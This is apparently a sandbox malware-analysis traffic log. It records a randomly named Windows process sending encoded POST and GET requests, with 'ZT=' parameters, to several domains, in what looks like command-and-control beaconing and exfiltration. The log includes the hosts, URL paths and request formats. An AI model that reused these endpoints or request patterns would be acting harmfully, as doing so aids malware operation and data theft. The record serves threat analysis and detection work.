                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.297676.com
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.297676.com
                                                                                                                                                                              Referer: http://www.297676.com/xyex/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Oct 30, 2024 08:12:48.894921064 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              date: Wed, 30 Oct 2024 07:12:47 GMT
                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                              content-length: 1110
                                                                                                                                                                              x-request-id: 22a49152-19cd-400e-b842-6d5c2b1920a9
                                                                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VvMkd70pcaa++xPHPET7k8HS9oPvuvUA+ckFU+grDEVs81sT6IXsqQaYMUjfPOmNLH9DqeVG1jduG9TKC3NhDw==
                                                                                                                                                                              set-cookie: parking_session=22a49152-19cd-400e-b842-6d5c2b1920a9; expires=Wed, 30 Oct 2024 07:27:48 GMT; path=/
                                                                                                                                                                              connection: close
                                                                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VvMkd70pcaa++xPHPET7k8HS9oPvuvUA+ckFU+grDEVs81sT6IXsqQaYMUjfPOmNLH9DqeVG1jduG9TKC3NhDw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                                                              Oct 30, 2024 08:12:48.894942045 CET | 563 | IN
                                                                                                                                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMjJhNDkxNTItMTljZC00MDBlLWI4NDItNmQ1YzJiMTkyMGE5IiwicGFnZV90aW1lIjoxNzMwMjcyMz


                                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                              36 | 192.168.2.4 | 50043 | 199.59.243.227 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                              Oct 30, 2024 08:12:50.816328049 CET | 443 | OUT | GET /xyex/?ZT=GRv8gXQeeb2Gl8ts68dy26JEIDOFTPQDU1Y3CPEivIL54q3aRuVfXNser16Tn8T/OBl4IICKxXKXWQiZ2Uzn7HwRtVNzQ2FbKXtno3vR39Y/zqEhWKkV0ww=&mTkD=Gj2Ti2T0g4 HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.297676.com
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Oct 30, 2024 08:12:51.442913055 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              date: Wed, 30 Oct 2024 07:12:51 GMT
                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                              content-length: 1450
                                                                                                                                                                              x-request-id: d9d4d9e9-8ec2-4b87-8190-2d8eda05b12e
                                                                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Bo3DenWrsvk5YA50spX/uELGa989cHoAuxnbur2u8jF1vWV08WsOG1s7ntsGbcSF1M86+E57Ct8bX6DR1mxm8w==
                                                                                                                                                                              set-cookie: parking_session=d9d4d9e9-8ec2-4b87-8190-2d8eda05b12e; expires=Wed, 30 Oct 2024 07:27:51 GMT; path=/
                                                                                                                                                                              connection: close
                                                                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Bo3DenWrsvk5YA50spX/uELGa989cHoAuxnbur2u8jF1vWV08WsOG1s7ntsGbcSF1M86+E57Ct8bX6DR1mxm8w==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                                                              Oct 30, 2024 08:12:51.442933083 CET | 903 | IN
                                                                                                                                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZDlkNGQ5ZTktOGVjMi00Yjg3LTgxOTAtMmQ4ZWRhMDViMTJlIiwicGFnZV90aW1lIjoxNzMwMjcyMz


                                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                              37 | 192.168.2.4 | 50044 | 217.76.156.252 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                              Oct 30, 2024 08:12:56.739907026 CET | 704 | OUT | POST /dma3/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.cesach.net
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.cesach.net
                                                                                                                                                                              Referer: http://www.cesach.net/dma3/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Ascii: ZT=FjnvS1XHEDZo/MTYGU7DOaR4jFqhIEz3nkD+ghhFuTqKAXClwU+Q1oAqWMXWOc5Nqm5+7u24nXLmrqiP9ovGnUJIeFdAFgcsUEVo4d1JAGCJbxXTk36forPZsUS3Z7eKJHtP1tlo1J9OTBLOEipOah5u3WA9l+5kUTvjnbX1y28Bx31dkkQk5u/+cwxPW5gDjQ==
                                                                                                                                                                              Oct 30, 2024 08:12:57.609009027 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:12:57 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              X-ServerIndex: llim604
                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Data Ascii: 1a9b<!DOCTYPE HTML><html lang="es"><head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <title>www.cesach.net</title> <meta name="description" content="" /> <link rel="stylesheet" href="https://piensasolutions.com/css/parking2.css"> <link href='https://fonts.googleapis.com/css?family=Exo' rel='stylesheet' type='text/css'> <meta id="theWidth" name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <script> window.onload = function () { if(screen.width <= 420) { var mvp = document.getElementById('theWidth'); mvp.setAttribute('content','width=400'); } } </script></head><body>... client --><header> <div class="center" style="color:#;border-color:#;"> <div class="title"> <img src="https://piensasolutions.com/imgs/parking/icon-parking.png"> <p>Esta es la p&aacute;gina de:</p> [TRUNCATED]
                                                                                                                                                                              Oct 30, 2024 08:12:57.609025955 CET212INData Raw: 3c 68 31 3e 77 77 77 2e 63 65 73 61 63 68 2e 6e 65 74 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 43 4f 4d 49 45 4e 5a 41 5f 54 45 58 54 4f 5f 52 45 47 49 53 54 52 41 4e 54 45 2d 2d 3e
                                                                                                                                                                              Data Ascii: <h1>www.cesach.net</h1> </div> ...COMIENZA_TEXTO_REGISTRANTE-->...TERMINA_TEXTO_REGISTRANTE--> ...COMIENZA_COMENTARIO-->...TERMINA_COMENTARIO--> ...COMIENZA_PIE_PERSONAL--
                                                                                                                                                                              Oct 30, 2024 08:12:57.609038115 CET1236INData Raw: 3e 3c 21 2d 2d 54 45 52 4d 49 4e 41 5f 50 49 45 5f 50 45 52 53 4f 4e 41 4c 2d 2d 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 61 63 6b 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d
                                                                                                                                                                              Data Ascii: >...TERMINA_PIE_PERSONAL--> </div> <div class="back" style="background-color:#;"></div></header>... end client -->... foot -->...COMIENZA_PIE_POR_DEFECTO--><section class="search"> <div class="center"> <di
                                                                                                                                                                              Oct 30, 2024 08:12:57.609051943 CET1236INData Raw: 63 74 6f 73 20 65 6e 20 6c 61 20 70 61 72 74 65 20 69 6e 66 65 72 69 6f 72 2e 3c 2f 70 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 3c 2f 61 73 69 64 65 3e 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 73 69 6d 70 6c 65 22 3e 0d 0a 20 20
                                                                                                                                                                              Data Ascii: ctos en la parte inferior.</p> </div></aside><section class="simple"> <span>Nuestros Productos</span> <div class="line"> <div class="center"> <a href="https://www.piensasolutions.com/web-sencilla?utm_so
                                                                                                                                                                              Oct 30, 2024 08:12:57.609108925 CET424INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 69 6d 67 73 2f 70 61 72 6b 69 6e 67 2f 69 63 6f 6e 2d 77 65 62 2e 70 6e 67 22 3e 0d 0a 20
                                                                                                                                                                              Data Ascii: <img src="https://piensasolutions.com/imgs/parking/icon-web.png"> <h2>MI P&Aacute;GINA WEB</h2> <p>Dise&ntilde;a tu propia p&aacute;gina web de forma profesional y de una manera r&aacute;pida y s
                                                                                                                                                                              Oct 30, 2024 08:12:57.609122992 CET1236INData Raw: 70 3b 75 74 6d 5f 6d 65 64 69 75 6d 3d 6c 69 6e 6b 26 61 6d 70 3b 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 73 73 6c 22 3e 3c 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73
                                                                                                                                                                              Data Ascii: p;utm_medium=link&amp;utm_campaign=ssl"><article> <img src="https://piensasolutions.com/imgs/parking/icon-ssl-parking.png"> <h2>CERTIFICADO SSL</h2> <p>Confianza y seguridad para tu web. Con u
                                                                                                                                                                              Oct 30, 2024 08:12:57.609217882 CET1236INData Raw: 61 20 64 65 20 70 72 65 73 65 6e 74 61 63 69 26 6f 61 63 75 74 65 3b 6e 20 63 6f 6e 66 69 67 75 72 61 62 6c 65 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 69 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 6f 6b 22 3e 3c 2f 69
                                                                                                                                                                              Data Ascii: a de presentaci&oacute;n configurable</li> <li><i class="icon-ok"></i> Directivas "Meta" para mejorar tu posicionamiento SEO</li> <li><i class="icon-ok"></i> Redirecci&oacute;n Web con URL fija</li> <li><
                                                                                                                                                                              Oct 30, 2024 08:12:57.609230042 CET224INData Raw: 22 20 74 69 74 6c 65 3d 22 53 c3 ad 67 75 65 6e 6f 73 20 65 6e 20 47 6f 6f 67 6c 65 2b 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 2e 2f 69 6d 67 2f 69 63 6f 6e 2d 67 70 6c 75 73 2d 73 6d 61 6c 6c 2e
                                                                                                                                                                              Data Ascii: " title="Sguenos en Google+"> <img src="./img/icon-gplus-small.png"></div>Google+</a> </li>--> </ul></footer>...TERMINA_PIE_POR_DEFECTO-->... end foot --></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.4 | 50045 | 217.76.156.252 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 08:12:59.292188883 CET | 724 | OUT | POST /dma3/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.cesach.net
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.cesach.net
                                                                                                                                                                              Referer: http://www.cesach.net/dma3/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Oct 30, 2024 08:13:00.169521093 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:13:00 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              X-ServerIndex: llim603
                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.4 | 50046 | 217.76.156.252 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 08:13:01.882767916 CET | 10806 | OUT | POST /dma3/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.cesach.net
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.cesach.net
                                                                                                                                                                              Referer: http://www.cesach.net/dma3/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Oct 30, 2024 08:13:02.751676083 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:13:02 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              X-ServerIndex: llim604
                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Oct 30, 2024 08:13:02.751864910 CET1236INData Raw: 52 4c 20 66 69 6a 61 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 69 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 6f 6b 22 3e 3c 2f 69 3e 20 46 69 6c 74 72 6f 20 41 6e 74 69 73 70 61 6d 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: RL fija</li> <li><i class="icon-ok"></i> Filtro Antispam</li> <li><i class="icon-ok"></i> 5 Cuentas de correo redirigido</li> </ul> </a></section><footer> <a class="logo" href="https://www.piens
                                                                                                                                                                              Oct 30, 2024 08:13:02.751876116 CET12INData Raw: 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: html>0


Session ID: 40
Source IP: 192.168.2.4
Source Port: 50047
Destination IP: 217.76.156.252
Destination Port: 80
PID: 3804
Process: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe

Timestamp: Oct 30, 2024 08:13:04.452014923 CET
Bytes transferred: 443
Direction: OUT
Data:
GET /dma3/?mTkD=Gj2Ti2T0g4&ZT=IhPPRAmDChEnx8G5Mk3wYKJVvliqClSy7lT3/i9hniKwN2WP3nmtzIAyaYX2MoR3jQRU/NaT7iTCvd3O/fPSuEFMVnQWNGAOAVxjgpJaGw2AUh+P10Czoew= HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Host: www.cesach.net
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko

Timestamp: Oct 30, 2024 08:13:05.362108946 CET
Bytes transferred: 1236
Direction: IN
Data:
HTTP/1.1 404 Not Found
Date: Wed, 30 Oct 2024 07:13:05 GMT
Server: Apache
X-ServerIndex: llim605
Upgrade: h2,h2c
Connection: Upgrade, close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


Session ID: 41
Source IP: 192.168.2.4
Source Port: 50048
Destination IP: 144.76.190.39
Destination Port: 80
PID: 3804
Process: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe

Timestamp: Oct 30, 2024 08:13:10.728018045 CET
Bytes transferred: 731
Direction: OUT
Data:
POST /3xn5/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.5
Host: www.basicreviews.online
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 199
Connection: close
Origin: http://www.basicreviews.online
Referer: http://www.basicreviews.online/3xn5/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Ascii: ZT=sJ/b/IKXRpCl1hxDMglwh/3f9n/3T6R5RQJ0LRUPgEkCT7E525+yAvCFcjUgUVGiqwlQU5Zu2+Y0vkI15jS1hAo9cX9pa139We4BfmPPtx36zZV9/WQ/9+qGlDkycC18TB7hqtMNLxfJuqIeZQVjOWjWWdw8BU4rc77Wc3/F8ozYkgbCmwA6Ktyq/rt1J/Z7XQ==

Timestamp: Oct 30, 2024 08:13:11.589212894 CET
Bytes transferred: 1045
Direction: IN
Data:
HTTP/1.1 302 Found
Connection: close
content-type: text/html
content-length: 771
date: Wed, 30 Oct 2024 07:13:11 GMT
server: LiteSpeed
cache-control: no-cache, no-store, must-revalidate, max-age=0
location: http://www.basicreviews.online/cgi-sys/suspendedpage.cgi
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


Session ID: 42
Source IP: 192.168.2.4
Source Port: 50049
Destination IP: 144.76.190.39
Destination Port: 80
PID: 3804
Process: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe

Timestamp: Oct 30, 2024 08:13:13.274454117 CET
Bytes transferred: 751
Direction: OUT
Data:
POST /3xn5/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.5
Host: www.basicreviews.online
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 219
Connection: close
Origin: http://www.basicreviews.online
Referer: http://www.basicreviews.online/3xn5/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Ascii: ZT=sJ/b/IKXRpCl6ghDOAZw1v3Yj3/3ZaR1RR10LUlUg2ACd+4534+yHvCFTDUpa1G9qwpiU8hu2640vhs14UO0hQozdn9rUV39We4Bfin1txP6zpl9tHQw8+qFiDkyYC14TB7TqsQ3L3DJur4eeBVsZGjULNwtI3VTS4WnaRyi6YvDlmWY3BhtYtWZiskBE8kyMdjEYgbv0tYZlmjEhQAVBoY=

Timestamp: Oct 30, 2024 08:13:14.199846983 CET
Bytes transferred: 1045
Direction: IN
Data:
HTTP/1.1 302 Found
Connection: close
content-type: text/html
content-length: 771
date: Wed, 30 Oct 2024 07:13:13 GMT
server: LiteSpeed
cache-control: no-cache, no-store, must-revalidate, max-age=0
location: http://www.basicreviews.online/cgi-sys/suspendedpage.cgi
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.4 | 50050 | 144.76.190.39 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 08:13:15.826363087 CET | 10833 | OUT | POST /3xn5/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.basicreviews.online
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.basicreviews.online
                                                                                                                                                                              Referer: http://www.basicreviews.online/3xn5/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.4 | 50051 | 144.76.190.39 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 08:13:18.366791964 CET | 452 | OUT | GET /3xn5/?ZT=hLX784qEA4n55Q1oGw1olOPE1jv2cb5vRwpnfGUpuE0YTY8y9L6/CN63cm0behm+qDJgSuJj8e8DxEJz6zH1lBsEYFc4WGfLLcwXK2bqtXGi64JZ82gh2/U=&mTkD=Gj2Ti2T0g4 HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.basicreviews.online
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Oct 30, 2024 08:13:19.209549904 CET | 1185 | IN | HTTP/1.1 302 Found
                                                                                                                                                                              Connection: close
                                                                                                                                                                              content-type: text/html
                                                                                                                                                                              content-length: 771
                                                                                                                                                                              date: Wed, 30 Oct 2024 07:13:19 GMT
                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                              cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                              location: http://www.basicreviews.online/cgi-sys/suspendedpage.cgi?ZT=hLX784qEA4n55Q1oGw1olOPE1jv2cb5vRwpnfGUpuE0YTY8y9L6/CN63cm0behm+qDJgSuJj8e8DxEJz6zH1lBsEYFc4WGfLLcwXK2bqtXGi64JZ82gh2/U=&mTkD=Gj2Ti2T0g4
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.4 | 50052 | 34.92.128.59 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 08:13:24.386512041 CET | 719 | OUT | POST /33ib/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.sgland06.online
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.sgland06.online
                                                                                                                                                                              Referer: http://www.sgland06.online/33ib/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
